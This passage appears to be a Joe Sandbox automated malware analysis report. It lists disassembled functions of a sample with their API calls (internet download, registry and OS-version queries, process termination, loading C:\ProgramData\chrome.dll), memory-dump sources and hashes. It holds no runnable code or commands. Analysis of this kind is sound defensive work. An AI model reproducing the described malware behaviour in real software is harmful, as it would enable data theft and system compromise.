                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: 258b67d18b59e90968323e874963e134156c51a5ba89a008cdbb4428107367f5
                                      • Instruction ID: 9d4e488072e18a33f07e786303b09af85b7e0499f78f99c0745f3387ddb1280d
                                      • Opcode Fuzzy Hash: 258b67d18b59e90968323e874963e134156c51a5ba89a008cdbb4428107367f5
                                      • Instruction Fuzzy Hash: 4CA135717002489FCB18EF64DA96FAD7776AF95300F50856EE40B9F351DA30DA05CB92
                                      Function 00B3F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00B3FA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00B3FA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00B3FAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00B3FADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00B3FB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: c7901d318d7082d3d82a194e138882a6116e74b161cfa8838e1058df0796cc5d
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: 7C418474D0011AEBCF10EF68C884AAEBBF5FF49314F2481E5E918AB351D7319A15CB91
                                      Function 00AC5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AC501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC5021
                                      • InternetOpenA.WININET(00AE0DE3,00000000,00000000,00000000,00000000), ref: 00AC503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00AC5061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00AC5091
                                      • InternetCloseHandle.WININET(?), ref: 00AC5109
                                      • InternetCloseHandle.WININET(?), ref: 00AC5116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: bdc29eca70a7e393c25e6a3072ebaa6247d37748c81e52e385b606623c677744
                                      • Instruction ID: 9e12ec6da16707a62e85356698c345d73f7ba10edb4e837d205ad0b3a4e0e2c7
                                      • Opcode Fuzzy Hash: bdc29eca70a7e393c25e6a3072ebaa6247d37748c81e52e385b606623c677744
                                      • Instruction Fuzzy Hash: 7831F5B4E44218ABDB20DF54DD85BDDB7B4AB48304F1081D9FA09A7381D7706AC58FA8
                                      Function 00AD856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AD85B6
                                      • wsprintfA.USER32 ref: 00AD85E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AD860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD8629
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,0154F200,00000000,000F003F,?,00000400), ref: 00AD867C
                                      • lstrlen.KERNEL32(?), ref: 00AD8691
                                      • RegQueryValueExA.ADVAPI32(00000000,0154F188,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00AE0B3C), ref: 00AD8729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD8798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD87AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 22c22fc6265e97dfb619d5ae324ee79491092535439c9a95a94cb198c48cbfbd
                                      • Instruction ID: 7da022d7cff501ac91f7b2a0bb101e60869a9f58d900694f5290d072eadec8cd
                                      • Opcode Fuzzy Hash: 22c22fc6265e97dfb619d5ae324ee79491092535439c9a95a94cb198c48cbfbd
                                      • Instruction Fuzzy Hash: 9A21FF7191021C9BDB24DB54DC85FD973B8FB48700F1085D9E609A6240DF756A85CFE4
                                      Function 00AD99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD99C5
                                      • Process32First.KERNEL32(00ACA056,00000128), ref: 00AD99D9
                                      • Process32Next.KERNEL32(00ACA056,00000128), ref: 00AD99F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AD9A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AD9A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00AD9A79
                                      • CloseHandle.KERNEL32(00ACA056), ref: 00AD9A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: e381fcdb912259f688301feb526644f4283f0c778a96e9c6112e1bf0ef2cf29c
                                      • Instruction ID: 6d705d7dcdb625b1b92cb3fefee9752b8fced3f24e3a0dbeed41dbc9212501e0
                                      • Opcode Fuzzy Hash: e381fcdb912259f688301feb526644f4283f0c778a96e9c6112e1bf0ef2cf29c
                                      • Instruction Fuzzy Hash: 2C21EA75914318ABDB21DFA1DC88BDEB7B9BB48340F1041C9E50AA73A0D7749E85CFA0
                                      Function 00AD7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0153B728,00000000,00020119,00000000), ref: 00AD786D
                                      • RegQueryValueExA.ADVAPI32(00000000,0154F1A0,00000000,00000000,?,000000FF), ref: 00AD788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00AD7898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 4f23b4de56536f5d42941b2a302e346f3e4bfc4c0bbba76ab82b0825ca836761
                                      • Instruction ID: ed40cda78fdf6ca9881dbbfb717aee9d0da93552cb5df00cdf1cde465d0cf022
                                      • Opcode Fuzzy Hash: 4f23b4de56536f5d42941b2a302e346f3e4bfc4c0bbba76ab82b0825ca836761
                                      • Instruction Fuzzy Hash: C3016275A18304BBEB04DBE4DD49F6E7778EB48B00F004096FA05E7390E7709A40DB64
                                      Function 00AD78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD78C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD78CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0153B728,00000000,00020119,00AD7849), ref: 00AD78EB
                                      • RegQueryValueExA.ADVAPI32(00AD7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00AD790A
                                      • RegCloseKey.ADVAPI32(00AD7849), ref: 00AD7914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: a33229f16418550eede972f28b9fb72e8f898164cf410386a539cade75553268
                                      • Instruction ID: c08d6410991ea2e5d281c98cc522258bcbb4f112e77f16cfac2a9a963fd15e1c
                                      • Opcode Fuzzy Hash: a33229f16418550eede972f28b9fb72e8f898164cf410386a539cade75553268
                                      • Instruction Fuzzy Hash: 6801F4B5A54309BBDB00DBE4DC49FAE7778EB44700F104596F605E7395E7705A408BA0
                                      Function 00AD4300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00AD4325
                                      • RegOpenKeyExA.ADVAPI32(80000001,0154E268,00000000,00020119,?), ref: 00AD4344
                                      • RegQueryValueExA.ADVAPI32(?,0154F548,00000000,00000000,00000000,000000FF), ref: 00AD4368
                                      • RegCloseKey.ADVAPI32(?), ref: 00AD4372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00AD4397
                                      • lstrcat.KERNEL32(?,0154F308), ref: 00AD43AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: b7c5fbfcb9a3966a1eef9cdda617fa970fc16bcb0ce416a9e07f404b0e229933
                                      • Instruction ID: d5da25d4e893aeb4f1e02e8c92b7ff002b266a277460924cc64d6c410d1efc54
                                      • Opcode Fuzzy Hash: b7c5fbfcb9a3966a1eef9cdda617fa970fc16bcb0ce416a9e07f404b0e229933
                                      • Instruction Fuzzy Hash: 41417EB69102086BDF14EBA0ED56FEE733DAB4C700F00855DB71697281FA7597888BE1
                                      Function 00ACA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ACA13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00ACA161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00ACA181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00AC148F,00000000), ref: 00ACA1AA
                                      • LocalFree.KERNEL32(00AC148F), ref: 00ACA1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00ACA1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 2a2374d24557d71e7d995ff4be3e9c84c5fecfc2a7f4197291c86a4a64d5d63a
                                      • Instruction ID: e25e38204c2165ce616ddec7e04d2c19972bccef49c63367ccae356e3aec5df6
                                      • Opcode Fuzzy Hash: 2a2374d24557d71e7d995ff4be3e9c84c5fecfc2a7f4197291c86a4a64d5d63a
                                      • Instruction Fuzzy Hash: EF31EA74A10209EFDB14CFA4D889FEE7BB5BF58704F108259E911A7390D774AA81CFA1
                                      Function 00ADCB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Typememset
                                      • String ID:
                                      • API String ID: 3530896902-3916222277
                                      • Opcode ID: 09055c1f6afc0a5a947a4ae703cbeed7e19c236372938f88b6cdb07f1bfedfe4
                                      • Instruction ID: c780e35feb4deebc8c4a367ce11848531aeb0eef1f5d580db4954b388e6d449e
                                      • Opcode Fuzzy Hash: 09055c1f6afc0a5a947a4ae703cbeed7e19c236372938f88b6cdb07f1bfedfe4
